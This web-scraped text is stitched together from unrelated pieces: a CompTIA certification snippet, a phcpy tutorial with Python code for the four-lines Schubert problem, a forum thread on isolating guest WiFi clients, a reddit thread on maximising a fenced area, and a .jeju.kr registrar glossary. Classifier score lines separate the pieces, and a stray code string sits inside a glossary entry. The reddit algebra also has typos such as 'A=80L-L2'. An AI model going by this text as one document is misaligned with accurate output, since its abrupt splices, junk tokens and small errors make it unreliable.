Signed Mark Data (SMD)
A Signed Mark Data (SMD) is file that will allow you to register domain names during the sunrise period of new gTLD’s and request other services. It validates that you trademark has been verified within the Trademark Clearinghouse (TMCH).
Trademark Claims
The trademark claims period extends for 90 days after the close of the Sunrise period. During the Claims period, anyone attempting to register a domain name matching a trademark that is recorded in the Trademark Clearinghouse will receive a notification displaying the relevant mark information. If the notified party goes and ahead and registers the domain name the Trademark Clearinghouse will send a notice to those trademark holders with matching records in the Clearinghouse, informing them that someone has registered the domain name.
|
__label__pos
| 0.720258 |
Boost C++ Libraries
...one of the most highly regarded and expertly designed C++ library projects in the world. Herb Sutter and Andrei Alexandrescu, C++ Coding Standards
This is the documentation for an old version of Boost. Click here to view this page for the latest version.
PrevUpHomeNext
common_type
Header: #include <boost/type_traits/common_type.hpp> or #include <boost/type_traits.hpp>
namespace boost {
template <class... T> struct common_type;
template<class... T> using common_type_t = typename common_type<T...>::type; // C++11 and above
}
common_type is a traits class used to deduce a type common to a several types, useful as the return type of functions operating on multiple input types such as in mixed-mode arithmetic..
The nested typedef ::type could be defined as follows:
template <class... T>
struct common_type;
template <class T, class U, class... V>
struct common_type<T, U, V...> {
typedef typename common_type<typename common_type<T, U>::type, V...>::type type;
};
template <>
struct common_type<> {
};
template <class T>
struct common_type<T> {
typedef typename decay<T>::type type;
};
template <class T, class U>
struct common_type<T, U> {
typedef typename decay<
decltype( declval<bool>()?
declval<typename decay<T>::type>():
declval<typename decay<U>::type>() )
>::type type;
};
All parameter types must be complete. This trait is permitted to be specialized by a user if at least one template parameter is a user-defined type. Note: Such specializations are required when only explicit conversions are desired among the common_type arguments.
Note that when the compiler does not support variadic templates (and the macro BOOST_NO_CXX11_VARIADIC_TEMPLATES is defined) then the maximum number of template arguments is 9.
Tutorial
In a nutshell, common_type is a trait that takes 1 or more types, and returns a type which all of the types will convert to. The default definition demands this conversion be implicit. However the trait can be specialized for user-defined types which want to limit their inter-type conversions to explicit, and yet still want to interoperate with the common_type facility.
Example:
template <class T, class U>
complex<typename common_type<T, U>::type>
operator+(complex<T>, complex<U>);
In the above example, "mixed-mode" complex arithmetic is allowed. The return type is described by common_type. For example the resulting type of adding a complex<float> and complex<double> might be a complex<double>.
Here is how someone might produce a variadic comparison function:
template <class ...T>
typename common_type<T...>::type
min(T... t);
This is a very useful and broadly applicable utility.
How to get the common type of types with explicit conversions?
Another choice for the author of the preceding operator could be
template <class T, class U>
typename common_type<complex<T>, complex<U> >::type
operator+(complex<T>, complex<U>);
As the default definition of common_type demands the conversion be implicit, we need to specialize the trait for complex types as follows.
template <class T, class U>
struct common_type<complex<T>, complex<U> > {
typedef complex< common_type<T, U> > type;
};
How important is the order of the common_type<> template arguments?
The order of the template parameters is important.
common_type<A,B,C>::type is not equivalent to common_type<C,A,B>::type, but to common_type<common_type<A,B>::type, C>::type.
Consider
struct A {};
struct B {};
struct C {
C() {}
C(A const&) {}
C(B const&) {}
C& operator=(C const&) {
return *this;
}
};
The following doesn't compile
typedef boost::common_type<A, B, C>::type ABC; // Does not compile
while
typedef boost::common_type<C, A, B>::type ABC;
compiles.
Thus, as common_type<A,B>::type is undefined, common_type<A,B,C>::type is also undefined.
It is intended that clients who wish for common_type<A, B> to be well defined to define it themselves:
namespace boost
{
template <>
struct common_type<A, B> {typedef C type;};
}
Now this client can ask for common_type<A, B, C> (and get the same answer).
Clients wanting to ask common_type<A, B, C> in any order and get the same result need to add in addition:
namespace boost
{
template <> struct common_type<B, A>
: public common_type<A, B> {};
}
This is needed as the specialization of common_type<A, B> is not be used implicitly for common_type<B, A>.
Can the common_type of two types be a third type?
Given the preceding example, one might expect common_type<A,B>::type to be C without any intervention from the user. But the default common_type<> implementation doesn't grant that. It is intended that clients who wish for common_type<A, B> to be well defined to define it themselves:
namespace boost
{
template <>
struct common_type<A, B> {typedef C type;};
template <> struct common_type<B, A>
: public common_type<A, B> {};
}
Now this client can ask for common_type<A, B>.
How does common_type behave with pointers?
Consider
struct C { }:
struct B : C { };
struct A : C { };
Shouldn't common_type<A*,B*>::type be C*? I would say yes, but the default implementation will make it ill-formed.
The library could add a specialization for pointers, as
namespace boost
{
template <typename A, typename B>
struct common_type<A*, B*> {
typedef common_type<A, B>* type;
};
}
But in the absence of a motivating use cases, we prefer not to add more than the standard specifies.
Of course the user can always make this specialization.
Can you explain the pros/cons of common_type against Boost.Typeof?
Even if they appear to be close, common_type and typeof have different purposes. You use typeof to get the type of an expression, while you use common_type to set explicitly the type returned of a template function. Both are complementary, and indeed common_type is approximately equivalent to decltype(declval<bool>() ? declval<T>() : declval<U>()).
common_type is also similar to promote_args<class ...T> in boost/math/tools/promotion.hpp, though it is not exactly the same as promote_args either. common_type<T1, T2>::type simply represents the result of some operation on T1 and T2, and defaults to the type obtained by putting T1 and T2 into a conditional statement.
It is meant to be customizable (via specialization) if this default is not appropriate.
PrevUpHomeNext
|
__label__pos
| 0.909851 |
summaryrefslogtreecommitdiffstats
path: root/include/internal/object.h
diff options
context:
space:
mode:
Diffstat (limited to 'include/internal/object.h')
-rw-r--r--include/internal/object.h13
1 files changed, 13 insertions, 0 deletions
diff --git a/include/internal/object.h b/include/internal/object.h
index ef49590..df002fd 100644
--- a/include/internal/object.h
+++ b/include/internal/object.h
@@ -222,6 +222,19 @@ struct nfct_filter {
u_int32_t mask;
} l3proto[2][__FILTER_ADDR_MAX];
+ /*
+ * FIXME: For IPv6 filtering, up to 20 IPs/masks (12 BSF lines
+ * per comparison). I think that it is not worthy to try to support
+ * more than that for performance reasons. It seems that oprofile
+ * shows bad numbers for very large BSF code.
+ */
+ u_int32_t l3proto_elems_ipv6[2];
+ struct {
+#define __FILTER_IPV6_MAX 20
+ u_int32_t addr[4];
+ u_int32_t mask[4];
+ } l3proto_ipv6[2][__FILTER_IPV6_MAX];
+
u_int32_t set[1];
};
|
__label__pos
| 0.973908 |
0
Cadastro alguns livros, após isso tento excluir algum com meu case 3, mas digitando o case 2 para mostrar todos ele continua mostrando o livro que deveria ter sido excluído. Meu case 4 deveria comparar a String genero digitada com a String genero da classe Livro de cada lista, mas ele sempre retorna o valor ZERO no meu count como se não tivesse nenhuma String igual ... Segue meu código principal e o objeto abaixo.
package application;
import java.util.ArrayList;
import java.util.List;
import java.util.Scanner;
import entities.Livro;
public class Program {
public static void main(String[] args) {
Scanner sc = new Scanner(System.in);
Livro livroLivraria;
List<Livro> livros = new ArrayList<>();
int count = 0;
System.out.println("1 - Cadastrar Livro\n2 - Listar \n3 - Excluir Livro\n4 - Pesquisar Livro pelo gênero\n"
+ "5 - Pesquisar Livro por faixa de preço\n6 - Calcular Total do Acervo\n7 - Sair\n");
int opcao = sc.nextInt();
do {
switch(opcao) {
case 1 : System.out.print("Quantos livros quer cadastrar ? ");
int j = sc.nextInt();
sc.nextLine();
for(int i=1; i <= j; i++) {
System.out.println("LIVRO " + i);
System.out.print("Nome: ");
String nome = sc.nextLine();
System.out.print("Autor: ");
String autor = sc.nextLine();
System.out.print("Gênero: ");
String genero = sc.nextLine();
System.out.print("Preço: ");
Double preco = sc.nextDouble();
sc.nextLine();
livroLivraria = new Livro(nome, autor, genero, preco);
livros.add(livroLivraria);
}
break;
case 2 : for (Livro l : livros) {
System.out.println(l);
}
break;
case 3 : System.out.print("Qual nome do livro que deseja excluir ? ");
String nome = sc.nextLine();
sc.nextLine();
for (Livro l : livros) {
if (l.getNome().equals(nome)) {
livros.remove(l);
}
}
System.out.println("Livro excluído...");
break;
case 4 : System.out.print("Qual gênero procura ? ");
String genero = sc.nextLine();
sc.nextLine();
count = 0;
for(Livro l : livros) {
if (l.getGenero().equals(genero)) {
count++;
}
}
System.out.println(count + " livros do gênero " + genero);
break;
case 5 : System.out.print("Digite o valor inicial: ");
double p1 = sc.nextDouble();
System.out.print("Digite o valor final: ");
double p2 = sc.nextDouble();
count = 0;
if (p1 < p2) {
for(Livro l : livros) {
if (l.getPreco() >= p1 && l.getPreco() <= p2) {
count++;
}
}
System.out.println(count + " livros entre os valores R$" + p1 + " e R$" + p2);
}else {
System.out.println("ERRO: valor inicial maior que valor final...");
}
break;
case 6 : double t=0;
for (Livro l : livros) {
t += l.getPreco();
}
System.out.println("Valor total dos livros R$" + t);
break;
case 7 : break;
default : System.out.println("Esta opção não existe...");
break;
}
System.out.println("\n1 - Cadastrar Livro\n2 - Listar \n3 - Excluir Livro\n4 - Pesquisar Livro pelo gênero\n"
+ "5 - Pesquisar Livro por faixa de preço\n6 - Calcular Total do Acervo\n7 - Sair\n");
opcao = sc.nextInt();
}while(opcao != 7);
sc.close();
}
}
Classe objeto Livro:
package entities;
public class Livro {
private String nome;
private String autor;
private String genero;
private Double preco;
public Livro(String nome, String autor, String genero, Double preco) {
this.nome = nome;
this.autor = autor;
this.genero = genero;
this.preco = preco;
}
public String getNome() {
return nome;
}
public void setNome(String nome) {
this.nome = nome;
}
public String getAutor() {
return autor;
}
public void setAutor(String autor) {
this.autor = autor;
}
public String getGenero() {
return genero;
}
public void setGenero(String genero) {
this.genero = genero;
}
public Double getPreco() {
return preco;
}
public void setPreco(Double preco) {
this.preco = preco;
}
@Override
public String toString() {
return "Livro [ Nome = " + nome + ", Autor = " + autor + ", Genero = " + genero + ", Preço = " + preco + " ]";
}
}
Como eu resolveria isso ?
0
O que ocorre é que no seu Case 3, no trecho:
System.out.print("Qual nome do livro que deseja excluir ? ");
String nome = sc.nextLine();
sc.nextLine();
Você chama o sc.nextLine() para a String nome, depois você anula chamando novamente o sc.nextLine(). Apenas invertendo as chamadas, o problema já não ocorre mais. É o mesmo caso para os outros cases.
System.out.print("Qual nome do livro que deseja excluir ? ");
sc.nextLine();
String nome = sc.nextLine();
Dê uma estudada sobre a classe Scanner e sobre imutabilidade.
Espero ter ajudado.
• Funcionou no case 4, mas o 3 dá o seguinte erro após eu digitar o nome do livro que desejo excluir: Qual nome do livro que deseja excluir ? HP2 Exception in thread "main" java.util.ConcurrentModificationException at java.base/java.util.ArrayList$Itr.checkForComodification(ArrayList.java:1042) at java.base/java.util.ArrayList$Itr.next(ArrayList.java:996) at application.Program.main(Program.java:54) – Guilherme Leandro 1/05/19 às 17:10
Sua resposta
Ao clicar em “Publique sua resposta”, você concorda com os termos de serviço, política de privacidade e política de Cookies
Esta não é a resposta que você está procurando? Pesquise outras perguntas com a tag ou faça sua própria pergunta.
|
__label__pos
| 0.989341 |
8
\$\begingroup\$
I recently answered a question on Mathematics Stack Exchange, where I used a small Python program to check the following :
For all 6-digit numbers, with all digits being different, choosing the digits one by one from left to right, the second last digit can always be chosen so that the number will never be a prime.
In a nutshell, I go through all the hundreds and check for each ten if there is at least one prime number. If this is true for all the tens in the hundred, then we check if the rule of all digits are different has been violated.
There is not much complicated algorithmic involved, but I look for an elegant and fast way to do this.
Here is the code :
# -*- encoding: utf-8 -*-
from math import sqrt
from _collections import defaultdict
def is_prime(n):
"""checks primality of n"""
if n == 2:
return True
if n % 2 == 0 or n <= 1:
return False
sqr = int(sqrt(n)) + 1
for divisor in xrange(3, sqr, 2):
if n % divisor == 0:
return False
return True
def has_primes(n):
"""checks if there are any primes in [n, n+9]
with the last digit different from the others"""
m = n / 10
l = [int(i) for i in str(m)]
for i in xrange(n + 1, n + 10, 2):
if (i % 10 not in l) and is_prime(i):
return True
return False
if __name__ == '__main__':
s = 100000
e = 1000000
res = list()
for h in xrange(s, e, 100): # hundreds
for t in xrange(h, h + 100, 10): # tens
if not has_primes(t):
break
else: # every ten has at least one prime
l = [int(i) for i in str(h / 100)]
d = defaultdict(int)
for i in l: # counting occurrences of each digit
d[i] += 1
print h
for i in d:
if d[i] > 1:
print '>', i
break
else:
res.append(h)
print '\nres :'
for n in res:
print n
I'd like to know how I could improve it. I'm particularly not satisfied with my testing of the doublon digits; it could maybe go only through the numbers with all-different digits. I don't know how to implement this efficiently.
If you are any other suggestions, they're very welcome. Thank you.
\$\endgroup\$
4
• 1
\$\begingroup\$ Your question seems interesting. Would you be able to tell us a bit more about the expected output and some explanation ? \$\endgroup\$
– SylvainD
Jul 11 '16 at 12:37
• \$\begingroup\$ Sure ! About which part do you need more explanations ? The output will be a list of numbers that satisfy the property, that is to say all the digits until the hundreds are different, and each ten of this hundred has a prime. The goal is to figure out if there can be a winning strategy to the game described in the linked question. \$\endgroup\$
– BusyAnt
Jul 11 '16 at 12:40
• \$\begingroup\$ I'm confused by this part of your question: "the second last digit can always be chosen". Is it the case that there is some (one) specific 2nd to last digit that we can use that will lead to all 6 digit numbers with all digits different being non-prime? Then why use the word "always"? \$\endgroup\$ Jul 11 '16 at 19:06
• 1
\$\begingroup\$ @BradThomas "always" was employed because the player needs a winning strategy, therefore they must "always"/"in all cases" be able to choose a number that leads to them winning. Perhaps is it more clear in the original question that I linked. \$\endgroup\$
– BusyAnt
Jul 11 '16 at 19:23
8
\$\begingroup\$
You can use itertools.permutations() to generate your sequences of unique digits. Also consider using itertools.groupby() to organize things nicely.
So first you can create all your non-dup-digit numbers as strings:
nodups = [''.join(s) for s in permutations('1234567890', 6)]
As Josay mentioned in a comment, '0123456789' can also be expressed as string.digits in python.
And Daerdemandt reminds us to remove numbers starting with 0. For efficiency's sake, let's just construct a generator instead of a list.
nodups = (''.join(s) for s in permutations('1234567890', 6) if s[0] != '0')
Now if you were to call the list() constructor on this you'd get something like:
['123456', '123457', '123458', '123459', '123450', '123465', '123467', '123468', '123469', '123460'...]
Then you need to organize by hundreds digits, more specifically everything except the last 2 digits ([:-2]):
hundo = groupby(nodups, lambda n: n[:-2])
Now hundo contains some nested generators so it might be hard to inspect on the surface, but if you unpacked everything inside you'd find something like this:
{'1235':
['123546',
'123547',
'123548',
...
],
'1234': ['123456',
'123457',
'123458',
...
]
...
}
Then organize each hundred-digit-group further by the tens digit, more specifically the second-to-last digit ([-2]):
hundreds = {h:{t:v for t,v in groupby(ns,lambda n: n[-2])} for h,ns in hundo}
That line is a bit of a mouthful, imagine the variables as
h -> hundreds group
t -> tens group
v -> the values in the tens group
ns -> the values in the hundreds group
You can kind of read it like "make a dictionary that maps each hundreds group to (a dictionary mapping each tens group in that hundreds group to the values in that tens group)."
Now they're organized to test in a structured way. Your check is, if I'm not misreading the problem statement:
all hundreds groups contain any (some) tens group with all not-primes
Or, in python:
all(
any(
all(not is_prime(int(n)) for n in ns)
for ns in tens.values()
)
for tens in hundreds.values()
)
If you want to log the counterexample, you could define a memoized_is_prime() function and use a global variable:
counter_example = None
def memoized_is_prime(n):
global counter_example
counter_example = n
return is_prime(n)
You'd just have to access the counter_example variable afterwards if your check returns False.
Although note that the global keyword is not strictly necessary here, and using global-style patterns is discouraged in general. It it fine in this tiny program but if you were to extend this code in any way you'd probably want to encapsulate your memoization.
I haven't tested this, feel free to try it out and let me know if you have any questions.
\$\endgroup\$
4
• 1
\$\begingroup\$ Nice answer. You could use string.digits instead of the manual definition. \$\endgroup\$
– SylvainD
Jul 11 '16 at 13:07
• \$\begingroup\$ Wow that's clever, I didn't even know about that. \$\endgroup\$ Jul 11 '16 at 13:09
• 2
\$\begingroup\$ Be sure to drop numbers starting with 0s though. \$\endgroup\$ Jul 11 '16 at 14:18
• \$\begingroup\$ @Daerdemandt: Confirmed and added \$\endgroup\$ Jul 11 '16 at 14:30
4
\$\begingroup\$
Factorisation of each number seems wasteful a bit. You could simply pre-generate list of all 6-digit primes.
Including less-than-6-digit primes would not spoil things but make implementation a bit easier and set could be called just primes.
Then the check would look like:
all(
any(
not(tens & primes)
) for tens in hundreds.values()
)
Use of all and any, as @machine yearning suggests is generally advised, not only because they are readable, but also performance-wise because they short circuit. Well, you do something similar with your break's but that does not look expressive enough and does not cover all cases.
However, if you'd like to also have a counterexample (if there is some) then all won't work. You can use some simple iteration and raise a custom exception when you've found a result (questionable, but will free you from cluttering your code with lots of checks), but that will only work if you need one counterexample.
I'd say we can split core of the logic and all the iteration by extracting logic to is_counterexample function, like that:
def is_counterexample(hundreds):
return all(tens & primes for tens in hundreds.values())
Then you generate all your hundreds and do either of 3 options:
• any if you need to check for counterexample
• filter if you need to get all counterexamples
• filter and use next on that to get 1 counterexample
• itertools.filterfalse (docs) to get all numbers that are not counterexamples.
The output will be a list of numbers that satisfy the property
Your code assumes you need #2 and accepted answer does #1 and in math context you'd probably get by with #3.
Edit: based on comment "...The output will be a list of numbers that satisfy the property...", added an option that implements that.
\$\endgroup\$
3
• \$\begingroup\$ This answer gives a remarkable complement. The previous one explained to me the basics of itertools though, that I didn't know about, and put me on the right path, that's why I accepted it. Thank you for these pieces of additional information and that new point of view ! \$\endgroup\$
– BusyAnt
Jul 11 '16 at 15:26
• 1
\$\begingroup\$ > basics of itertools Make sure you are familiar with generators, especially with a yield from thing. Generating data only as you need it is indeed powerful tool but casts to eager data structures without necessity waste some of that power. \$\endgroup\$ Jul 11 '16 at 15:41
• 1
\$\begingroup\$ @Daerdemandt. Nice stuff here. Really good point about needless casting. I'll edit my answer just to include a way of grabbing a counterexample \$\endgroup\$ Jul 11 '16 at 20:48
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service, privacy policy and cookie policy
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.52024 |
IPAD downloads, virus etc...?
Discussion in 'iPad 2 Forum' started by GapsterLeFayt, Dec 28, 2011.
1. GapsterLeFayt
GapsterLeFayt iPF Novice
Joined:
Dec 28, 2011
Messages:
17
Thanks Received:
0
Trophy Points:
0
Location:
France
Ratings:
+0 / 0
According to the sales guy all the apps come via apple and itunes so there shouldn't be any need for virus software.... not convinced by this.
ie. How does it work when installing Skype for ipad directly to your ipad?
2. freebirdforever
freebirdforever iPad Ninja
Joined:
May 5, 2010
Messages:
1,511
Thanks Received:
13
Trophy Points:
38
Location:
Minnesota
Ratings:
+13 / 0
You do not need antivirus software.
Sent from my DROID2 GLOBAL using Tapatalk
3. freebirdforever
freebirdforever iPad Ninja
Joined:
May 5, 2010
Messages:
1,511
Thanks Received:
13
Trophy Points:
38
Location:
Minnesota
Ratings:
+13 / 0
All of the apps in the appstore are throughly checked by Apple before being approved to go in the store. There is no way an app with a virus could get into the appstore. It's one of the beauties about apples "closed" system.
Sent from my DROID2 GLOBAL using Tapatalk
4. thewitt
thewitt iPad Ninja
Joined:
Jun 5, 2011
Messages:
1,634
Thanks Received:
72
Trophy Points:
48
Ratings:
+79 / 0
If you jailbreak, you have the ability to load apps outside the Apple App Store, and as such are vulnerable to malware on your iPad. The only known iOS infections have been on jail broken devices.
5. elau
elau iPF Novice
Joined:
Dec 29, 2011
Messages:
34
Thanks Received:
0
Trophy Points:
6
Location:
Third rock from the Sun
Ratings:
+0 / 0
What about while surfing the web? Can you get virus that way?
6. jsh1120
jsh1120 iPad Addict
Joined:
Jan 27, 2010
Messages:
1,292
Thanks Received:
87
Trophy Points:
0
Location:
Seattle, Washington USA
Ratings:
+87 / 0
That explanation wouldn't convince me, either. But apart from the fact that Apple curates the applications offered in iTunes, there's a more fundamental reason that the iPad is not (as) susceptible to viruses and malware as other platforms. You may hear people talk about the iPad's "walled garden" or "closed" design for applications. What this means is that an app and all the data it uses are segregated from the rest of the operating system. Therefore, it is simply not possible for an app to contain code that "escapes" from the application and impacts other apps or the operating system.
This is a very good design if your highest priority is eliminating virus and malware threats but it does have downsides. For example, there is no "common" file system accessible from multiple applications. That means that if you have a single document, only one application can modify that document. Another app has to work with its own copy of the document. Thus, it is sometimes problematic to use multiple applications accessing the same data. You will see this most obviously if you have a photo or a PDF and want to use different apps with that data. Changes by one app will not be reflected by the other unless you export the document and then re-import it to another app.
So the bottom line is that you don't have to rely just on the fact that Apple imposes rigorous tests on apps available in the App Store. The software architecture of iOS provides its own barrier to malware. Of course, it's possible to circumvent these protections to some extent by jailbreaking an iOS device. And that is one reason Apple tries so diligently to prevent jailbreaking. But even then, the underlying architecture of iOS is a pretty good defense.
P.S. In response to another question above, the same logic applies to picking up a virus via a browser. Any malware you might download from a browser cannot "escape" to affect the operating system.
7. thewitt
thewitt iPad Ninja
Joined:
Jun 5, 2011
Messages:
1,634
Thanks Received:
72
Trophy Points:
48
Ratings:
+79 / 0
There has only been one browser based exploit discovered, and that was through a PDF file. It was patched before any damage was done.
8. Blackbelt
Blackbelt iPad Enthusiast
Joined:
Nov 2, 2010
Messages:
335
Thanks Received:
11
Trophy Points:
0
Location:
Palm Beaches
Ratings:
+11 / 0
IOS or OSX devices DO NOT need anti virus. Another words : PC gets virus, Apple does not.
9. wydelode
wydelode iPF Noob
Joined:
Dec 29, 2011
Messages:
3
Thanks Received:
0
Trophy Points:
0
Ratings:
+0 / 0
Yet.
Share This Page
Search tags for this page
can ipad get a virus when surfing internet
,
can ipad get virus surfing the internet
,
ipad antivirus while surfing web
,
will ipad get virus from internet
,
www.ipad fro viruce garde
|
__label__pos
| 0.960728 |
0 votes
203 views
Hi,
I am using openLCA v.1.9. After creation of product system and calculation,in the results I do not have any process result,contribution tree and etc in the tab.Does any body know the reason?
thanks
in openLCA by (540 points)
1 Answer
+1 vote
by (4.4k points)
selected by
Best answer
Dear Zoli,
when you do the calculation, choose "Analysis" instead of "Quick results", that should give you the missing tabs.
by (540 points)
Dear Tim,
Thank you so much ,Its true.
...
|
__label__pos
| 0.99409 |
Functional Points Calculation 1
Given the following values, compute F.P when all complexity adjustment factors and weighting factors are average.
• User I/P = 50
• User O/P = 40
• User Inquires = 35
• User Files = 6
• External Interfaces = 4
Functional UnitWighting Factors
LowAverageHigh
External Inputs (EI) 346
External Outputs (EO) 457
External Enquired (EQ) 346
Internal Logic Files (ILF) 71015
External Interface Files (EIF) 5710
Solution:
Here, we are given functional units as:
• User I/P = 50
• User O/P = 40
• User Inquires = 35
• User Files = 6
• External Interfaces = 4
Also we are given,
Complexity Adjustment Factors are average.
0 - No Influences
1 - Incidental
2 - Moderate
3 - Average
4 - Significant
5 - Essential
And Weighting Factors are also average.
AVERAGE complexity weights = {4, 5, 4, 10, 7} for the 5 complexities respectively.
Now,
We know that,
Final F.P = UFP X CAF
Where UFP (Unadjusted Functional Points)
Unadjustment Functional Points
And CAF (Complexity Adjustment Factor)
Complexity Adjustment Factor Unadjusted Function Points
UFP = 50 x 4 + 40 x 5 + 35 x 4 + 6 x 10 + 4 x 7
UFP = 200 + 200 + 140 + 60 + 28
UFP = 628
CAF = 0.65 + 0.01 (14 x 3)
CAF = 1.07
F.P = UFP x CAF
F.P = 628 x 1.07
F.P = 671.96
Therefore Function Points = 671.96
Also study another type of Software Estimation: COCOMO MODEL
Master2Teach YouTube Channel
In this YouTube Channel, you can find different kind of useful tutorials related to information technologies.
|
__label__pos
| 0.523859 |
Pengertian VTP (VLAN Trunking Protocol)
Menurut Cisco System Inc, trunk adalah sebuah sambungan point-to-point antara satu atau lebih Ethernet switch interface dengan perangkat lainnya, seperti router atau switch. Ethernet trunk dapat membawa lalu lintas data dari berbagai VLAN hanya dalam sebuah link. Sebuah VLAN trunk memungkinkan pertukaran data dalam seluruh jaringan. Metode trunk ini menggunakan protokol IEEE 802.10 untuk saling berkomunikasi pada interface Fast Ethernet dan Gigabit Ethernet. Saat menggunakan beberapa VLAN pada jaringan yang memiliki beberapa switch yang terhubung, maka switch-switch tersebut harus menerapkan VLAN trunking pada segmen yang menghubungkan switch dengan switch lainnya. Trunk merupakan penghubung antar-switch yang saling berhubungan dalam VLAN Secara sederhana, trunk dapat dijelaskan pada gambar berikut.
Baca Juga: Tipe VLAN (Virtual Local Area Network) dalam Jaringan Komputer
Ketika menggunakan beberapa VLAN pada jaringan yang memiliki beberapa switch yang terhubung, maka switch-switch tersebut harus menerapkan VLAN trunking pada segmen yang menghubungkan switch dengan switch lainnya. Sebuah trunk tidak bergantung pada salah satu VLAN, melainkan trunk dikategorikan sebagai penghubung antar-VLAN di antara switch dan router. Switching tabel pada kedua ujung trunk dapat digunakan untuk membuat keputusan forwarding berdasarkan MAC address tujuan dari frame.
Seiring dengan bertambahnya jumlah VLAN yang melalui trunk link, keputusan forwarding menjadi lebih lambat dan lebih sulit. Hal ini dikarenakan switching tabel yang lebih besar memerlukan waktu yang lebih lama untuk diproses.
Protokol trunking dikembangkan untuk mengatur perpindahan frame dari VLAN yang berbeda pada sebuah link fisik tunggal secara efektif. Ada dua tipe mekanisme trunking, yaitu frame filtering dan frame tagging.
|
__label__pos
| 0.998614 |
Ayende @ Rahien
Hi!
My name is Oren Eini
Founder of Hibernating Rhinos LTD and RavenDB.
You can reach me by phone or email:
[email protected]
+972 52-548-6969
, @ Q c
Posts: 18 | Comments: 84
filter by tags archive
Source control is not a feature you can postpone to vNext
time to read 4 min | 771 words
I was taking part in a session in the MVP Summit today, and I came out of it absolutely shocked and bitterly disappointed with the product that was under discussion. I am not sure if I can talk about that or not, so we will skip the name and the purpose. I have several issues with the product itself and its vision, but that is beside the point that I am trying to make now.
What really bothered me is utter ignorance of a critical requirement from Microsoft, who is supposed to know what they are doing with software development. That requirement is source control.
• Source control is not a feature
• Source control is a mandatory requirement
The main issue is that the product uses XML files as its serialization format. Those files are not meant for human consumption, but should be used only through a tool. The major problem here is that no one took source control into consideration when designing those XML files, so they are unmergable.
Let me give you a simple scenario:
• Developer A makes a change using the tool, let us say that he is modifying an attribute on an object.
• Developer B makes a change using the tool, let us say tat he is modifying a different attribute on a different object.
The result?
Whoever tries to commit last will get an error, the file was already updated by another guy. Usually in such situations you simply merge the two versions together, and don't worry about this.
The problem is that this XML file is implemented in such a way that each time you save it, a whole bunch of stuff gets moved around, all sort of unrelated things change, etc. In short, even a very minor change cause a significant change in the underlying XML.
You can see this in products that are shipping today, like SSIS, WF, DSL Toolkit, etc.
The problem is that when you try to merge, you have too many unrelated changes, which completely defeat the purpose of merging.
This, in turn, means that you lose the ability to work in a team environment. This product is supposed to be aimed at big companies. But it can't suppose a team of more than one! To make things worse, when I brought up this issue, the answer was something along the line: "Yes, we know about this issue, but you can avoid this using exclusive checkouts."
At that point, I am not really sure what to say. Merges happen not just when two developers modify the same file, merges also happen when you have branches. As a simple scenario, I have a development branch and a production branch. Fixing a bug in the production branch requires touching this XML file. But if I made any change to it on the development branch, you can't merge that. What happen if I use a feature branch? Or version branches?
Not considering the implications of something as basic as source control is amateurish in the extreme. Repeating the same mistake, over and over again, across multiple products, despite customer feedback on how awful this is and how much it hurt the developers who are going to use it shows contempt to the end developers, and a sign of even more serious issue: the team isn't dogfooding the product. Not in any real capacity. Otherwise, they would have already noticed the issue, much sooner in the lifetime of the product, with enough time to actually fix that.
As it was, I was told that there is nothing to do for the v1 release, that puts the fix (at best) in two years or so. For something that is a complete deal breaker for any serious development.
I have run into issues where merge issues with SSIS caused us to have to drop days of work and having to recreating everything from scratch, costing us something in the order of two weeks. I know of people that had the same issue with WF, and from my experiments, the DSL toolkit has had the exact same issue. The SSIS issues were initially reported on 2005, but are not going to be fixed for the 2008 (or so I heard from public sources) , which puts the nearest fix for something as basic as getting source control right in a 2-3 years time.
The same for the product that I am talking about here. I am not really getting that, does Microsoft things that source control isn't an important issue? They keep repeating this critically serious mistake!
For me, this is unprofessional behavior of the first degree.
Deal breaker, buh-bye.
Comments
Tom Isaacson
We have the same problem with another Microsoft product - Visual Studio 2005. The contents of the .vcproj files used to store project details get moved around randomly every time a change is made. It makes merging changes automatically impossible.
Frans Bouma
Is the entity framework designer that bad? ;)
Btw, nhibernate xml mapping files (where everything is in 1 mapping file) has the same issue IMHO.
It's related to a file where references are stored between elements in that same file. you can only solve that by using some sort of textbased DSL, as sourcecontrol merge algorithms are good at merging these.
The thing with XML is that it's easy to write a parser for the xml format (as you can get away with serializers) than writing a DSL.
pete w
I would love to hear a little more context on this subject but I suppose that when the product you are talking about hits the market, it will probably be rather obvious :)
Chris Ortman
@Tom: Ouch, I didn't know that about vcproj files. Is 2008 any better?
El Guapo
Linq to SQL does not seem to have this problem so it must be entity framework.
Frans: Why are you storing everything in 1 mapping file? We use 1 file per entity. Also, I don't see how NH mapping files have this problem. They are edited by hand and dont randomly change and move stuff.
Will
Is this an MS problem, a VSTS problem, an X problem (where X is a program whose output is in xml format and is under source control) or is it the nature of the XML beast?
Which is it?
Clearly XML doesn't force you to place tags in a specific order. So, wouldn't this be an issue with any product on any platform with any source control?
Frans Bouma
@el Guapo: 1 mapping file could be a choice for people with hundreds of entities perhaps. Otherwise you'll have xml files all over the place.
That they're edited by hand is no excuse. 300 entity definitions which have references to eachother all over the place makes it hard to version it, especially with larger sets it means that changes can be bigger and happen more often than when a simple name change is performed.
Alex Simkin
Oh, I know what you are talking about...
If configuration were coded in Boo, it would be much easier to merge files.
Right?
Glyn
I would guess the product is called Biztalk.
The problem is not that its an xml file, its the fact that when you change something the xml file structure gets reformatted, hence the conflict.
Alex Simkin
I would guess that product is whatever with VISUAL DESIGNER.
It is almost impossible to show the delta or facilitate merge visually and if you look under the hood, nothing is not human readable.
Chad Myers
Ayende, I wrote a post kinda like this, about the minimum requirements for producing good software. I think it's even more than JUST source control.
To avoid being accused of link-whoring, I'll post the URL through tinyurl:
http://tinyurl.com/6bclpl
I think source control, continuous integration, etc all come back to 'repeatability'. If your software can't be found, built, and tested repeatably by someone on a PC other than yours, that's very bad!
Driesie
The nHibernate mapping file argument doesn't hold up. Xml is (or should be) easy to merge using an XML diff tool. The point that is being made, which I would imagine is exactly the same problem as with SSIS today, is that the tool doesn't just "change" and attribute. It just serialises a load of "stuff" into an xml file that isn't structured very well, so there's no way a diff tool can do a good job. I can't see why you would ever completely re-order and re-structure an nHibernate mapping file and then try to merge it. Usually you will change a value, add a node, remove a node ... all sorts of things that are easy to merge.
